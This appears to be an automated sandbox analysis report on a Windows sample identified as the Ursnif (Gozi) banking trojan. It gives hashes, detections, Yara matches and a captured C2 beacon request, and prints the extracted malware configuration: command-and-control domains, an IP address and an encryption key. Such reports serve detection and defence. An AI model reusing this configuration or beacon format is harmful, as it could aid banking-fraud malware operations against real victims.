Windows Analysis Report
d2ef5.exe

Overview

General Information

Sample Name: d2ef5.exe
Analysis ID: 730728
MD5: 1d8a445bef0c0d4a7ec519f06c23224a
SHA1: 7dd349b8664ec7dbe769da64e1b324ae091a29e2
SHA256: e807c46ba7cd53bf6900d1a8f32baba9a118410483faa68d51b233de738483e3
Tags: exe
Infos:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Yara detected Ursnif
Found evasive API chain (may stop execution after checking system information)
Writes or reads registry keys via WMI
Writes registry values via WMI
Found API chain indicative of debugger detection
Machine Learning detection for sample
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Uses a known web browser user agent for HTTP communication
Internet Provider seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: d2ef5.exe Avira: detected
Multi AV Scanner detection for submitted file
Source: d2ef5.exe ReversingLabs: Detection: 88%
Machine Learning detection for sample
Source: d2ef5.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.d2ef5.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen7
Source: 0.0.d2ef5.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen7
Source: d2ef5.exe Malware Configuration Extractor: Ursnif {"RSA Public Key": "GM4Kf/Z6rOnx7ZeOHNCGqGU1EYR+rHVcPFJfnB66sRxq8TdAtJ8I/FA73jILYN/O7GBQZXfAayteZ+p+Oku4j4TsVhRTMO69ts5LXnUBL3YpRQLuom+BvNzXjhoKt16kcxpwisrVl8sSl78o2iV+WuT7m9YMZQozEdttRTBIHJpzQtPr0h5BHHk+OiA9EQSDmlX7UvBgY8bViZ8LVgRE2j8GEgfNQW2WNlu1n810ZdnxshlFew+L2+9Be0oR+u+GXheI+qCLyYBkG5dNS0/RoFfmz5khmlLokQND0e2gq8+13HHHxrou4IGiYjMoDNLBLxynxiy1GeKRmyNpR0hR7RNZZpmu8ADCXrY93ygL4yQ=", "c2_domain": ["trackingg-protectioon.cdn1.mozilla.net", "siwdmfkshsgw.com", "trackingg-protectioon.cdn1.mozilla.net", "188.127.224.114", "weiqeqwns.com", "weiqeqwens.com", "weiqewqwns.com", "iujdhsndjfks.com", "ijduwhsbvk.com"], "botnet": "10103", "server": "50", "serpent_key": "9wGFk6w5pVKRz0Hz", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
Uses 32bit PE files
Source: d2ef5.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49695 -> 194.58.112.174:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49695 -> 194.58.112.174:80
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uploaded/pQRddRleZXP/sJg6GhFwZ0qmTC/meZE4SAXFSLuHXPcM_2FX/I4WPB1zBKUN7tcbv/VUX_2BXZPhSScwW/gPk8TGBKaZ5_2FVNf4/DQeVzjyY8/FEmgZVIU8bIRy_2Fy_2B/ldiKoh_2BMRhcwD6rsx/9uRA7vzxbfQ5nCWulzQQLg/RkGHi7DfmhmHl/i8REEpeY/pVP2haL0B_2FgslxWZs9c8a/fbu4j_2B3O/khl76mXAZINveCWsL/tlJp4SNzPxCO/Atw8nEb7TnS/YtJYMZTM8xwnaZ/S9ay0CGGR/2erETTDs/i5PM.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: siwdmfkshsgw.comConnection: Keep-AliveCache-Control: no-cache
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-REGRU AS-REGRU
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 194.58.112.174 194.58.112.174
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 26 Oct 2022 06:31:08 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 61 35 63 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 73 69 77 64 6d 66 6b 73 68 73 67 77 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2d 63 6f 6e 74 65 6e 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2d 63 6f 6e 74 65 6e 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2d 63 6f 6e 74 65 6e 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73
Source: d2ef5.exe, 00000000.00000003.484854452.00000000015FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=siwdmfkshsgw.com&rand=
Source: d2ef5.exe, 00000000.00000003.484862658.00000000015FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://reg.ru
Source: d2ef5.exe, 00000000.00000003.484854452.00000000015FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
Source: d2ef5.exe, 00000000.00000003.484854452.00000000015FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.reg.ru/dedicated/?utm_source=siwdmfkshsgw.com&utm_medium=parking&utm_campaign=s_land_ser
Source: d2ef5.exe, 00000000.00000003.484854452.00000000015FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.reg.ru/domain/new/?utm_source=siwdmfkshsgw.com&utm_medium=parking&utm_campaign=s_land_ne
Source: d2ef5.exe, 00000000.00000003.484854452.00000000015FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.reg.ru/hosting/?utm_source=siwdmfkshsgw.com&utm_medium=parking&utm_campaign=s_land_host&
Source: d2ef5.exe, 00000000.00000003.484845306.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, d2ef5.exe, 00000000.00000003.484854452.00000000015FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.reg.ru/support/ssl-sertifikaty/zakaz-ssl-sertifikata/Kak-zakazat-besplatny-SSL-sertifika
Source: d2ef5.exe, 00000000.00000003.484854452.00000000015FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.reg.ru/web-sites/?utm_source=siwdmfkshsgw.com&utm_medium=parking&utm_campaign=s_land_cms
Source: d2ef5.exe, 00000000.00000003.484854452.00000000015FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=siwdmfkshsgw.com&utm_medium=parking&utm_cam
Source: d2ef5.exe, 00000000.00000003.484862658.00000000015FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.reg.ru/whois/?check=&dname=siwdmfkshsgw.com&reg_source=parking_auto
Source: unknown DNS traffic detected: queries for: trackingg-protectioon.cdn1.mozilla.net
Source: global traffic HTTP traffic detected: GET /uploaded/pQRddRleZXP/sJg6GhFwZ0qmTC/meZE4SAXFSLuHXPcM_2FX/I4WPB1zBKUN7tcbv/VUX_2BXZPhSScwW/gPk8TGBKaZ5_2FVNf4/DQeVzjyY8/FEmgZVIU8bIRy_2Fy_2B/ldiKoh_2BMRhcwD6rsx/9uRA7vzxbfQ5nCWulzQQLg/RkGHi7DfmhmHl/i8REEpeY/pVP2haL0B_2FgslxWZs9c8a/fbu4j_2B3O/khl76mXAZINveCWsL/tlJp4SNzPxCO/Atw8nEb7TnS/YtJYMZTM8xwnaZ/S9ay0CGGR/2erETTDs/i5PM.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: siwdmfkshsgw.comConnection: Keep-AliveCache-Control: no-cache

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.441282479.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.441258936.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.441128955.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440946252.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.441227319.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.569972070.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.441026847.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.441081684.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.441301430.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: d2ef5.exe PID: 4684, type: MEMORYSTR
Source: Yara match File source: 0.2.d2ef5.exe.420000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.d2ef5.exe.10194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.569687253.0000000001019000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

E-Banking Fraud
barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.441282479.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.441258936.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.441128955.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440946252.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.441227319.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.569972070.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.441026847.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.441081684.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.441301430.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: d2ef5.exe PID: 4684, type: MEMORYSTR
Source: Yara match File source: 0.2.d2ef5.exe.420000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.d2ef5.exe.10194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.569687253.0000000001019000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000000.00000003.441282479.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.441282479.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.441258936.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.441258936.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.441128955.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.441128955.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.440946252.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.440946252.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.441227319.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.441227319.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000002.569972070.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000002.569972070.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.441026847.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.441026847.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.441081684.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.441081684.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.441301430.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.441301430.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: d2ef5.exe PID: 4684, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: Process Memory Space: d2ef5.exe PID: 4684, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Writes or reads registry keys via WMI
Source: C:\Users\user\Desktop\d2ef5.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\Desktop\d2ef5.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\d2ef5.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\d2ef5.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Users\user\Desktop\d2ef5.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\d2ef5.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\d2ef5.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Uses 32bit PE files
Source: d2ef5.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 00000000.00000003.441282479.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.441282479.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.441258936.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.441258936.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.441128955.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.441128955.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.440946252.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.440946252.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.441227319.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.441227319.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000002.569972070.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000002.569972070.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.441026847.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.441026847.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.441081684.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.441081684.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.441301430.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.441301430.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
